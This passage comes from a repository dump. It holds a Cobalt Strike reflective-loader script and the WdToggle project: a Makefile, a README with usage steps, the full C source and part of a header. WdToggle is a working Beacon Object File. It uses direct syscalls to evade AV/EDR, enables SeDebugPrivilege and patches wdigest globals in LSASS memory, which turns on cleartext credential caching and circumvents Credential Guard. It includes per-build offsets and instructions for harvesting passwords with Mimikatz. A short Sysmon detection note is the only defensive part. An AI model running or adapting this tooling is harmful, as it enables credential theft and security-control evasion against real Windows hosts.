Cobalt Strike Reflective Loader."); 14 | return $null; 15 | } 16 | # --------------------------------------------------------------------- 17 | # extract loader ($loader) from the object file data ($data). 18 | # --------------------------------------------------------------------- 19 | $loader = extract_reflective_loader($data); 20 | warn("Extracted Length: " . strlen($loader)); 21 | if (strlen($loader) eq 0) { 22 | warn("Error loading reflective loader object file - Reverting to using default Cobalt Strike Reflective Loader."); 23 | return $null; 24 | } 25 | # --------------------------------------------------------------------- 26 | # Setup the reflective loader ($loader) in the beacon ($2). 27 | # --------------------------------------------------------------------- 28 | $temp_dll = setup_reflective_loader($2, $loader); 29 | # --------------------------------------------------------------------- 30 | # Give back the updated beacon DLL. 31 | # --------------------------------------------------------------------- 32 | return $temp_dll; 33 | } 34 | # ------------------------------------ 35 | # $1 = DLL file name 36 | # $2 = DLL content 37 | # $3 = arch 38 | # ------------------------------------ 39 | set BEACON_RDLL_GENERATE { 40 | if ($3 eq "x86") { 41 | warn("x86 selected - Reverting to using default Cobalt Strike Reflective Loader."); 42 | return $null; 43 | } 44 | warn("========== Running 'BEACON_RDLL_GENERATE' for DLL " . $1 . " with architecture " . $3 . " =========="); 45 | return generate_my_dll($1, $2, $3); 46 | } 47 | -------------------------------------------------------------------------------- /github/WdToggle/Makefile: -------------------------------------------------------------------------------- 1 | BOF := WdToggle 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | 4 | all: 5 | $(CC_x64) -o $(BOF).o -c WdToggle.c -masm=intel 6 | 7 | clean: 8 | rm $(BOF).o 9 | -------------------------------------------------------------------------------- /github/WdToggle/README.md: -------------------------------------------------------------------------------- 1 | # WdToggle # 2 | 3 | A Proof of Concept Cobalt Strike Beacon Object File which uses [direct system calls](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/) to enable **WDigest** credential caching and circumvent **Credential Guard** (if enabled). 4 | 5 | Additional guidance can be found in this blog post: https://outflank.nl/blog/?p=1592 6 | 7 | ### Background ### 8 | 9 | This PoC code is based on the following excellent blog posts: 10 | 11 | [Exploring Mimikatz - Part 1 - WDigest](https://blog.xpnsec.com/exploring-mimikatz-part-1/) 12 | 13 | [Bypassing Credential Guard](https://teamhydra.blog/2020/08/25/bypassing-credential-guard/) 14 | 15 | Utilizing direct systems calls via inline assembly in BOF code provides a more opsec safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls. 16 | 17 | Visual Studio (C++) does not support inline assembly for x64 processors. So in order to write a single Beacon Object File containing our compiled / assembled code code we must use the [Mingw-w64](http://mingw-w64.org) (GCC for Windows) compiler. 18 | 19 | ### What is this repository for? ### 20 | 21 | * Demonstrate the usage of direct systems calls using inline-assembly to provide a more opsec safe way of interacting with the LSASS process. 22 | * Enable **WDigest** credential caching by toggling the ``g_fParameter_UseLogonCredential`` global parameter to 1 within the LSASS process (wdigest.dll module). 23 | * Circumventing **Credential Guard** (if enabled) by toggling the ``g_IsCredGuardEnabled`` variable to 0 within the LSASS process (wdigest.dll module). 24 | * Execute this code within the Beacon process using a [Beacon object file](https://www.cobaltstrike.com/help-beacon-object-files). 25 | 26 | ### How do I set this up? ### 27 | 28 | We will not supply compiled binaries. You will have to do this yourself: 29 | * Clone this repository. 30 | * Make sure you have the Mingw-w64 compiler installed. On Mac OSX for example, we can use the ports collection to install Mingw-w64 (``sudo port install mingw-w64``). 31 | * Run the ``make`` command to compile the Beacon object file. 32 | * Within a Cobaltstrike beacon context run the ``inline-execute`` command and provide the path to the object ``WdToggle.o`` file. 33 | * Run the Cobaltstrike ``logonpasswords`` command (Mimikatz) and notice that clear text passwords are enabled again for new user logins or users who **unlock** their desktop session. 34 | 35 | ![WdToggle](WdToggle.png) 36 | 37 | ### Limitations ### 38 | 39 | * This memory patch is not reboot persistent, so after a reboot you must rerun the code. 40 | * The memory offset to the ``wdigest!g_fParameter_UseLogonCredential`` and ``wdigest!g_IsCredGuardEnabled`` global variable could change between Windows versions and revisions. We provided some offsets for different builds, but these can change in future releases. You can add your own version offsets which can be found using the Windows debugger tools. 41 | 42 | ``` 43 | C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll 44 | 45 | 0:000>x wdigest!g_fParameter_UseLogonCredential 46 | 00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = 47 | 0:000> x wdigest!g_IsCredGuardEnabled 48 | 00000001`80035c08 wdigest!g_IsCredGuardEnabled = 49 | 0:000> 50 | ``` 51 | 52 | ### Detection ### 53 | 54 | To detect credential theft through LSASS memory access, we could use a tool like [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon). 55 | Sysmon can be configured to log processes opening a handle to the lsass.exe process. With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detecting possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like Windows Defender ATP. But if you don’t have the budget and luxury of using these platforms, then Sysmon is that free tool that can help to fill up the gap. 56 | 57 | ### Credits ### 58 | 59 | * The assembly code used within this tool is based on the assembly output from the 60 | [SysWhispers](https://github.com/jthuraisamy/SysWhispers) tool from [@Jackson_T](https://twitter.com/Jackson_T). 61 | * Adam Chester [@\_xpn\_](https://twitter.com/_xpn_) 62 | * N4kedTurtle from [Team Hydra](https://teamhydra.blog) 63 | -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include "WdToggle.h" 5 | #include "Syscalls.h" 6 | #include "beacon.h" 7 | 8 | 9 | // Open a handle to the LSASS process 10 | HANDLE GrabLsassHandle(DWORD dwPid) { 11 | NTSTATUS status; 12 | HANDLE hProcess = NULL; 13 | OBJECT_ATTRIBUTES ObjectAttributes; 14 | 15 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); 16 | CLIENT_ID uPid = { 0 }; 17 | 18 | uPid.UniqueProcess = (HANDLE)(DWORD_PTR)dwPid; 19 | uPid.UniqueThread = (HANDLE)0; 20 | 21 | status = ZwOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE, &ObjectAttributes, &uPid); 22 | if (hProcess == NULL) { 23 | return NULL; 24 | } 25 | 26 | return hProcess; 27 | } 28 | 29 | // Read memory from LSASS process 30 | SIZE_T ReadFromLsass(HANDLE hLsass, LPVOID pAddr, LPVOID pMemOut, SIZE_T memOutLen) { 31 | NTSTATUS status = 0; 32 | SIZE_T bytesRead = 0; 33 | 34 | MSVCRT$memset(pMemOut, 0, memOutLen); 35 | 36 | status = ZwReadVirtualMemory(hLsass, pAddr, pMemOut, memOutLen, &bytesRead); 37 | if (status != STATUS_SUCCESS) { 38 | return 0; 39 | } 40 | 41 | return bytesRead; 42 | } 43 | 44 | // Write memory to LSASS process 45 | SIZE_T WriteToLsass(HANDLE hLsass, LPVOID pAddr, LPVOID memIn, SIZE_T memInLen) { 46 | NTSTATUS status = 0; 47 | SIZE_T bytesWritten = 0; 48 | 49 | status = ZwWriteVirtualMemory(hLsass, pAddr, memIn, memInLen, &bytesWritten); 50 | if (status != STATUS_SUCCESS) { 51 | return 0; 52 | } 53 | 54 | return bytesWritten; 55 | } 56 | 57 | BOOL ToggleWDigest(HANDLE hLsass, LPSTR scWdigestMem, DWORD64 logonCredential_offSet, BOOL bCredGuardEnabled, DWORD64 credGuardEnabled_offset) { 58 | ULONG ulNewLogonValue = 1, ulNewCredGuardValue = 0; 59 | ULONG ulCurLogonValue, ulCurCredGuardValue; 60 | SIZE_T sResult = 0; 61 | 62 | LPVOID pAddrOfUseLogonCredentialGlobalVariable = (PUCHAR)scWdigestMem + logonCredential_offSet; 63 | LPVOID pAddrOfIsCredGuardEnabledGlobalVariable = (PUCHAR)scWdigestMem + credGuardEnabled_offset; 64 | 65 | BeaconPrintf(CALLBACK_OUTPUT, "[*] g_fParameter_UseLogonCredential at 0x%p\n", pAddrOfUseLogonCredentialGlobalVariable); 66 | if (bCredGuardEnabled) { 67 | BeaconPrintf(CALLBACK_OUTPUT, "[*] g_IsCredGuardEnabled at 0x%p\n", pAddrOfIsCredGuardEnabledGlobalVariable); 68 | } 69 | 70 | // Read current value of wdigest!g_fParameter_useLogonCredential 71 | sResult = ReadFromLsass(hLsass, pAddrOfUseLogonCredentialGlobalVariable, &ulCurLogonValue, sizeof(ULONG)); 72 | if (sResult == 0) { 73 | return FALSE; 74 | } 75 | 76 | if (ulCurLogonValue == 1) { 77 | BeaconPrintf(CALLBACK_OUTPUT, "[*] UseLogonCredential already enabled\n\n"); 78 | return TRUE; 79 | } 80 | else if (ulCurLogonValue != 0) { 81 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Unexpected g_fParameter_UseLogonCredential value (possible offset mismatch?)\n\n"); 82 | return FALSE; 83 | } 84 | else { 85 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Current value of g_fParameter_UseLogonCredential is: %d\n", ulCurLogonValue); 86 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n"); 87 | } 88 | 89 | sResult = WriteToLsass(hLsass, pAddrOfUseLogonCredentialGlobalVariable, &ulNewLogonValue, sizeof(ULONG)); 90 | if (sResult == 0) { 91 | return FALSE; 92 | } 93 | 94 | // Read new value of wdigest!g_fParameter_useLogonCredential 95 | ReadFromLsass(hLsass, pAddrOfUseLogonCredentialGlobalVariable, &ulCurLogonValue, sizeof(ULONG)); 96 | BeaconPrintf(CALLBACK_OUTPUT, "[*] New value of g_fParameter_UseLogonCredential is: %d\n", ulCurLogonValue); 97 | 98 | if (bCredGuardEnabled && credGuardEnabled_offset != 0) { 99 | // Read current value of wdigest!g_IsCredGuardEnabled 100 | sResult = ReadFromLsass(hLsass, pAddrOfIsCredGuardEnabledGlobalVariable, &ulCurCredGuardValue, sizeof(ULONG)); 101 | if (sResult == 0) { 102 | return FALSE; 103 | } 104 | 105 | if (ulCurCredGuardValue == 0) { 106 | BeaconPrintf(CALLBACK_OUTPUT, "[*] IsCredGuardEnabled already disabled\n\n"); 107 | return TRUE; 108 | } 109 | else if (ulCurCredGuardValue != 1) { 110 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Unexpected g_IsCredGuardEnabled value (possible offset mismatch?)\n\n"); 111 | return FALSE; 112 | } 113 | else { 114 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Current value of g_IsCredGuardEnabled is: %d\n", ulCurCredGuardValue); 115 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Toggling g_IsCredGuardEnabled to 0 in lsass.exe\n"); 116 | } 117 | 118 | sResult = WriteToLsass(hLsass, pAddrOfIsCredGuardEnabledGlobalVariable, &ulNewCredGuardValue, sizeof(ULONG)); 119 | if (sResult == 0) { 120 | return FALSE; 121 | } 122 | 123 | // Read new value of wdigest!g_IsCredGuardEnabled 124 | ReadFromLsass(hLsass, pAddrOfIsCredGuardEnabledGlobalVariable, &ulCurCredGuardValue, sizeof(ULONG)); 125 | BeaconPrintf(CALLBACK_OUTPUT, "[*] New value of g_IsCredGuardEnabled is: %d\n", ulCurCredGuardValue); 126 | } 127 | 128 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Done... WDigest credential caching should now be on\n\n"); 129 | 130 | return TRUE; 131 | } 132 | 133 | HANDLE OpenRegKeyHandle(INT DesiredAccess, PUNICODE_STRING RegistryKeyName) { 134 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 135 | HANDLE regKeyHandle = NULL; 136 | 137 | OBJECT_ATTRIBUTES ObjectAttributes; 138 | InitializeObjectAttributes(&ObjectAttributes, RegistryKeyName, OBJ_CASE_INSENSITIVE, NULL, NULL); 139 | 140 | Status = ZwOpenKey(®KeyHandle, DesiredAccess, &ObjectAttributes); 141 | if (Status != STATUS_SUCCESS) { 142 | return NULL; 143 | } 144 | 145 | return regKeyHandle; 146 | } 147 | 148 | // Read UBR (Update Build Revision) from registry 149 | DWORD ReadUBRFromRegistry() { 150 | NTSTATUS Status = STATUS_UNSUCCESSFUL; 151 | HANDLE regKeyHandle = NULL; 152 | UNICODE_STRING RegistryKeyName; 153 | UNICODE_STRING KeyValueName; 154 | PKEY_VALUE_FULL_INFORMATION KeyValueInformation = NULL; 155 | ULONG KeyResultLength = 0; 156 | DWORD dwValueData = 0; 157 | 158 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) 159 | GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString"); 160 | if (RtlInitUnicodeString == NULL) { 161 | return 0; 162 | } 163 | 164 | RtlInitUnicodeString(&RegistryKeyName, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion"); 165 | RtlInitUnicodeString(&KeyValueName, L"UBR"); 166 | 167 | regKeyHandle = OpenRegKeyHandle(KEY_QUERY_VALUE, &RegistryKeyName); 168 | if (regKeyHandle == NULL) { 169 | return 0; 170 | } 171 | 172 | Status = ZwQueryValueKey(regKeyHandle, &KeyValueName, KeyValueFullInformation, NULL, 0, &KeyResultLength); 173 | if (Status != STATUS_BUFFER_TOO_SMALL) { 174 | goto CleanUp; 175 | } 176 | 177 | KeyValueInformation = (PKEY_VALUE_FULL_INFORMATION)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, KeyResultLength); 178 | Status = ZwQueryValueKey(regKeyHandle, &KeyValueName, KeyValueFullInformation, KeyValueInformation, KeyResultLength, &KeyResultLength); 179 | if (Status != STATUS_SUCCESS) { 180 | goto CleanUp; 181 | } 182 | 183 | dwValueData = *((DWORD*)((PUCHAR)&KeyValueInformation[0] + KeyValueInformation[0].DataOffset)); 184 | 185 | CleanUp: 186 | 187 | if (regKeyHandle != NULL) { 188 | ZwClose(regKeyHandle); 189 | } 190 | 191 | if (KeyValueInformation != NULL) { 192 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, KeyValueInformation); 193 | } 194 | 195 | return dwValueData; 196 | } 197 | 198 | // Searches for lsass.exe PID 199 | DWORD GetLsassPid(LPCWSTR lpwLsass) { 200 | NTSTATUS status; 201 | LPVOID pBuffer = NULL; 202 | DWORD dwPid = 0; 203 | ULONG uReturnLength = 0; 204 | SIZE_T uSize = 0; 205 | PSYSTEM_PROCESSES pProcInfo = NULL; 206 | 207 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) 208 | GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString"); 209 | if (RtlInitUnicodeString == NULL) { 210 | return 0; 211 | } 212 | 213 | _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString) 214 | GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlEqualUnicodeString"); 215 | if (RtlEqualUnicodeString == NULL) { 216 | return 0; 217 | } 218 | 219 | status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength); 220 | if (!(status == STATUS_INFO_LENGTH_MISMATCH)) { 221 | return 0; 222 | } 223 | 224 | uSize = uReturnLength; 225 | status = ZwAllocateVirtualMemory(NtCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE); 226 | if (status != STATUS_SUCCESS) { 227 | return 0; 228 | } 229 | 230 | status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength); 231 | if (status != STATUS_SUCCESS) { 232 | status = ZwFreeVirtualMemory(NtCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE); 233 | return 0; 234 | } 235 | 236 | UNICODE_STRING uLsass; 237 | RtlInitUnicodeString(&uLsass, lpwLsass); 238 | 239 | pProcInfo = (PSYSTEM_PROCESSES)pBuffer; 240 | do { 241 | pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta); 242 | 243 | if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &uLsass, TRUE)) { 244 | dwPid = (DWORD)(DWORD_PTR)pProcInfo->ProcessId; 245 | goto CleanUp; 246 | } 247 | 248 | if (pProcInfo->NextEntryDelta == 0) { 249 | break; 250 | } 251 | 252 | } while (pProcInfo); 253 | 254 | CleanUp: 255 | 256 | if (pBuffer != NULL) { 257 | ZwFreeVirtualMemory(NtCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE); 258 | } 259 | 260 | return dwPid; 261 | } 262 | 263 | BOOL SetDebugPrivilege() { 264 | HANDLE hToken = NULL; 265 | TOKEN_PRIVILEGES TokenPrivileges = { 0 }; 266 | 267 | NTSTATUS status = ZwOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken); 268 | if (status != STATUS_SUCCESS) { 269 | return FALSE; 270 | } 271 | 272 | TokenPrivileges.PrivilegeCount = 1; 273 | TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 274 | 275 | LPCWSTR lpwPriv = L"SeDebugPrivilege"; 276 | if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &TokenPrivileges.Privileges[0].Luid)) { 277 | ZwClose(hToken); 278 | return FALSE; 279 | } 280 | 281 | status = ZwAdjustPrivilegesToken(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL); 282 | if (status != STATUS_SUCCESS) { 283 | ZwClose(hToken); 284 | return FALSE; 285 | } 286 | 287 | ZwClose(hToken); 288 | 289 | return TRUE; 290 | } 291 | 292 | 293 | VOID go(IN PCHAR Args, IN ULONG Length) { 294 | HANDLE hLsass = NULL; 295 | HMODULE* hLsassDll = NULL; 296 | DWORD bytesReturned; 297 | DWORD cbNeeded; 298 | CHAR modName[MAX_PATH]; 299 | LPSTR wdigest = NULL; 300 | BOOL bCredGuardEnabled = FALSE; 301 | DWORD64 logonCredential_offSet = 0; 302 | DWORD64 credGuardEnabled_offset = 0; 303 | DWORD dwResult = 0; 304 | 305 | WCHAR chOSMajorMinor[8]; 306 | DWORD dwUBR = 0; 307 | PNT_TIB pTIB = NULL; 308 | PTEB pTEB = NULL; 309 | PPEB pPEB = NULL; 310 | DWORD dwLsassPID = 0; 311 | DWORD dwLsaIsoPID = 0; 312 | 313 | 314 | pTIB = (PNT_TIB)GetTEBAsm64(); 315 | 316 | pTEB = (PTEB)pTIB->Self; 317 | pPEB = (PPEB)pTEB->ProcessEnvironmentBlock; 318 | if (pPEB == NULL) { 319 | return; 320 | } 321 | 322 | MSVCRT$swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", pPEB->OSMajorVersion, pPEB->OSMinorVersion); 323 | 324 | // Read UBR value from registry (we don't want to screw up lsass) 325 | dwUBR = ReadUBRFromRegistry(); 326 | if (dwUBR != 0) { 327 | BeaconPrintf(CALLBACK_OUTPUT, "Windows version: %ls, OS build number: %u.%u\n", chOSMajorMinor, pPEB->OSBuildNumber, dwUBR); 328 | } 329 | else { 330 | BeaconPrintf(CALLBACK_OUTPUT, "Windows version: %ls, OS build number: %u\n", chOSMajorMinor, pPEB->OSBuildNumber); 331 | } 332 | 333 | // Offsets for wdigest!g_fParameter_UseLogonCredential (here you can add offsets for additional OS builds/revisions) 334 | // C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll 335 | // 0:000>x wdigest!g_fParameter_UseLogonCredential 336 | // 0:000>x wdigest!g_IsCredGuardEnabled 337 | if (MSVCRT$_wcsicmp(chOSMajorMinor, L"6.3") == 0 && pPEB->OSBuildNumber == 9600 && dwUBR >= 19747) { // 8.1 / W2k12 R2 338 | logonCredential_offSet = 0x33040; 339 | } 340 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 14393 && dwUBR >= 3686) { // v1607 341 | logonCredential_offSet = 0x35dc0; 342 | credGuardEnabled_offset = 0x35ba8; 343 | } 344 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 17763 && dwUBR >= 1457) { // v1809 345 | logonCredential_offSet = 0x36114; 346 | credGuardEnabled_offset = 0x35b88; 347 | } 348 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 18362 && dwUBR >= 1110) { // v1903 349 | logonCredential_offSet = 0x36124; 350 | credGuardEnabled_offset = 0x35b88; 351 | } 352 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 18363 && dwUBR >= 1110) { // v1909 353 | logonCredential_offSet = 0x36124; 354 | credGuardEnabled_offset = 0x35b88; 355 | } 356 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 19041 && dwUBR >= 572) { // v2004 357 | logonCredential_offSet = 0x361b4; 358 | credGuardEnabled_offset = 0x35c08; 359 | } 360 | else if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber == 19042 && dwUBR >= 630) { // v20H2 361 | logonCredential_offSet = 0x361b4; 362 | credGuardEnabled_offset = 0x35c08; 363 | } 364 | else { 365 | BeaconPrintf(CALLBACK_ERROR, "[!] OS Version/build/revision not supported\n"); 366 | return; 367 | } 368 | 369 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Enable SeDebugPrivilege\n"); 370 | if (!SetDebugPrivilege()) { 371 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Failed to enable SeDebugPrivilege\n"); 372 | return; 373 | } 374 | 375 | dwLsassPID = GetLsassPid(L"lsass.exe"); 376 | if (dwLsassPID != 0) { 377 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Lsass PID is: %u\n", dwLsassPID); 378 | } 379 | else{ 380 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Failed to obtain to lsass PID\n"); 381 | return; 382 | } 383 | 384 | if (MSVCRT$_wcsicmp(chOSMajorMinor, L"10.0") == 0 && pPEB->OSBuildNumber >= 14393) { 385 | dwLsaIsoPID = GetLsassPid(L"lsaiso.exe"); 386 | if (dwLsaIsoPID != 0) { 387 | bCredGuardEnabled = TRUE; 388 | BeaconPrintf(CALLBACK_OUTPUT, "[*] Credential Guard enabled, LsaIso PID is: %u\n", dwLsaIsoPID); 389 | } 390 | } 391 | 392 | hLsass = GrabLsassHandle(dwLsassPID); 393 | if (hLsass == NULL || hLsass == INVALID_HANDLE_VALUE) { 394 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Could not open handle to lsass process\n"); 395 | goto CleanUp; 396 | } 397 | 398 | if(!PSAPI$EnumProcessModules(hLsass, 0, 0, &cbNeeded)){ 399 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Failed to enumerate modules\n"); 400 | goto CleanUp; 401 | } 402 | 403 | hLsassDll = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbNeeded); 404 | if (hLsassDll == NULL) { 405 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Failed to allocate modules memory\n"); 406 | goto CleanUp; 407 | } 408 | 409 | // Enumerate all loaded modules within lsass process 410 | if (PSAPI$EnumProcessModules(hLsass, hLsassDll, cbNeeded, &bytesReturned)) { 411 | for (int i = 0; i < bytesReturned / sizeof(HMODULE); i++) { 412 | PSAPI$GetModuleFileNameExA(hLsass, hLsassDll[i], modName, sizeof(modName)); 413 | if (MSVCRT$strstr(modName, "wdigest.DLL") != (LPSTR)NULL) { 414 | wdigest = (LPSTR)hLsassDll[i]; 415 | break; 416 | } 417 | } 418 | } 419 | else { 420 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: No modules in LSASS :(\n"); 421 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: %d\n", KERNEL32$GetLastError()); 422 | } 423 | 424 | // Make sure we have all the DLLs that we require 425 | if (wdigest == NULL) { 426 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Could not find all DLL's in LSASS :(\n"); 427 | goto CleanUp; 428 | } 429 | 430 | BeaconPrintf(CALLBACK_OUTPUT, "[*] wdigest.dll found at 0x%p\n", wdigest); 431 | 432 | if (!ToggleWDigest(hLsass, wdigest, logonCredential_offSet, bCredGuardEnabled, credGuardEnabled_offset)) { 433 | BeaconPrintf(CALLBACK_ERROR, "[!] Error: Could not patch g_fParameter_UseLogonCredential\n"); 434 | goto CleanUp; 435 | } 436 | 437 | CleanUp: 438 | 439 | if (hLsass != NULL) { 440 | ZwClose(hLsass); 441 | } 442 | 443 | if (hLsassDll != NULL) { 444 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, hLsassDll); 445 | } 446 | 447 | return; 448 | } 449 | -------------------------------------------------------------------------------- /github/WdToggle/WdToggle.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define STATUS_SUCCESS 0 6 | #define STATUS_UNSUCCESSFUL 0xC0000001 7 | #define STATUS_BUFFER_TOO_SMALL 0xC0000023 8 | #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 9 | 10 | #define OBJ_CASE_INSENSITIVE 0x00000040L 11 | 12 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 13 | 14 | //KERNEL32 15 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 16 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 17 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 18 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID); 19 | 20 | //MSVCRT 21 | WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1, const wchar_t *_Str2); 22 | WINBASEAPI int __cdecl MSVCRT$swprintf_s(wchar_t *buffer, size_t sizeOfBuffer, const wchar_t *format, ...); 23 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strstr(const char *haystack, const char *needle); 24 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 25 | 26 | //ADVAPI32 27 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 28 | 29 | //PSAPI 30 | DECLSPEC_IMPORT WINBOOL WINAPI PSAPI$EnumProcessModules(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded); 31 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExA(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize); 32 | 33 | #define InitializeObjectAttributes( i, o, a, r, s ) { \ 34 | (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 35 | (i)->RootDirectory = r; \ 36 | (i)->Attributes = a; \ 37 | (i)->ObjectName = o; \ 38 | (i)->SecurityDescriptor = s; \ 39 | (i)->SecurityQualityOfService = NULL; \ 40 | } 41 | 42 | typedef enum _KEY_VALUE_INFORMATION_CLASS { 43 | KeyValueBasicInformation, 44 | KeyValueFullInformation, 45 | KeyValuePartialInformation, 46 | KeyValueFullInformationAlign64, 47 | KeyValuePartialInformationAlign64, 48 | KeyValueLayerInformation, 49 | MaxKeyValueInfoClass 50 | } KEY_VALUE_INFORMATION_CLASS; 51 | 52 | typedef enum _SYSTEM_INFORMATION_CLASS { 53 | SystemBasicInformation, 54 | SystemProcessorInformation, 55 | SystemPerformanceInformation, 56 | SystemTimeOfDayInformation, 57 | SystemPathInformation, 58 | SystemProcessInformation, 59 | SystemCallCountInformation, 60 | SystemDeviceInformation, 61 | SystemProcessorPerformanceInformation, 62 | SystemFlagsInformation, 63 | SystemCallTimeInformation, 64 | SystemModuleInformation, 65 | SystemProcessIdInformation = 88 66 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 67 | 68 | typedef LONG KPRIORITY; 69 | 70 | typedef struct _UNICODE_STRING { 71 | USHORT Length; 72 | USHORT MaximumLength; 73 | PWSTR Buffer; 74 | } UNICODE_STRING, *PUNICODE_STRING; 75 | 76 | typedef const UNICODE_STRING* PCUNICODE_STRING; 77 | 78 | typedef struct _SYSTEM_PROCESSES { 79 | ULONG NextEntryDelta; 80 | ULONG ThreadCount; 81 | ULONG Reserved1[6]; 82 | LARGE_INTEGER CreateTime; 83 | LARGE_INTEGER UserTime; 84 | LARGE_INTEGER KernelTime; 85 | UNICODE_STRING ProcessName; 86 | KPRIORITY BasePriority; 87 | HANDLE ProcessId; 88 | HANDLE InheritedFromProcessId; 89 | } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 90 | 91 | typedef struct _OBJECT_ATTRIBUTES { 92 | ULONG Length; 93 | HANDLE RootDirectory; 94 | PUNICODE_STRING ObjectName; 95 | ULONG Attributes; 96 | PVOID SecurityDescriptor; 97 | PVOID SecurityQualityOfService; 98 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 99 | 100 | typedef struct _CLIENT_ID { 101 | HANDLE UniqueProcess; 102 | HANDLE UniqueThread; 103 | } CLIENT_ID, *PCLIENT_ID; 104 | 105 | typedef struct _IO_STATUS_BLOCK 106 | { 107 | union 108 | { 109 | LONG Status; 110 | PVOID Pointer; 111 | }; 112 | ULONG Information; 113 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 114 | 115 | typedef struct _PEB_LDR_DATA { 116 | ULONG Length; 117 | BOOLEAN Initialized; 118 | HANDLE SsHandle; 119 | LIST_ENTRY InLoadOrderModuleList; 120 | LIST_ENTRY InMemoryOrderModuleList; 121 | LIST_ENTRY InInitializationOrderModuleList; 122 | 